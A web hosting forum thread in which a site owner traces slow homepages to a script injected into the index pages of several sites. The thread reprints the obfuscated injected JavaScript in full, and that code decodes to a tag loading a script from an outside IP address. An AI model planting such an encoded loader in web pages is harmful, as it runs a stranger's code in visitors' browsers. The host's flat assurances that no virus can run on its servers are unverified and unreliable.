Default page on all my sites very very slow to load

[talawa]

Hi

I have noticed recently (last week or so) that the homepage of all of my domains takes an age to load. Also all other pages of the sites are loading at normal speed.

Has anyone else experienced this?

Please see what i am talking about by browsing :

http://www.reggaenews.co.uk
http://www.makating.net
http://www.reggaenewsstore.com

This is worrying me becuase a lot of users are not going to bother to wait til the page loads.

 

[SubSpace]

The problem is caused by you trying to load http://216.69.161.136/top/foto.js in some scrambled JavaScript code. I can't even get the file to load directly as the server is consistently timing out.

I'm pretty sure 216.69.161.136 is not a JodoHost server.

 

[Yash]

yes, 216.69.161.136 is NOT one of our IPs.

 

[talawa]

Thanks guys.

Somehow a robot/virus has managed to write into the HTML of the index pages of all my site and write the following code:

<body> 
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264DTDSJQU%2631MBOHVBHF%264E%2633kbwbtdsjqu%2633%2631TSD%264E%2633iuuq%264B00327/7%3A/272/2470upq0gpup/kt%2633%264F%264D0TDSJQU%264F1')</script> 
</body>

Anyone heard of this happening before. Is it possible that there is a virus on the box that these sites are hosted?

 

[SubSpace]

I've never seen anything like it happen..

I very much doubt it's a server wide problem, as 3 of your sites seem to be affected. I don't know which server you are on (dedicated IPs?), but I'm sure other people would have complained if it was..

 

[talawa]

They are on win6. 1 of the domain is dedicated IP (reggaenews.co.uk) but the others are not.

Also I havent uploaded new version of these index pages for ages so it cannot be my local machine which wrote to the files and then I uploaded them.

Very strange.

 

[jmbeach]

this sounds familiar... a company that did some promotional campaigns for us was hosting several pages for us, and their entire server came under an attack that wrote some bogus js code. Can't remember how malicious it was, but it was enough to set off our virus scan...

What kind of virus scanning is done on Jodo's servers?

 

[Yash]

Regular virus scans are performed on the servers.

If a customer uploads a virus to his account, it would never go beyond his account so there is absolutely no way a virus could spread on our servers like that or cause any damage. There is no way a virus can get executed on our servers.

I am pretty confident the infection would have nothing to do with Win6.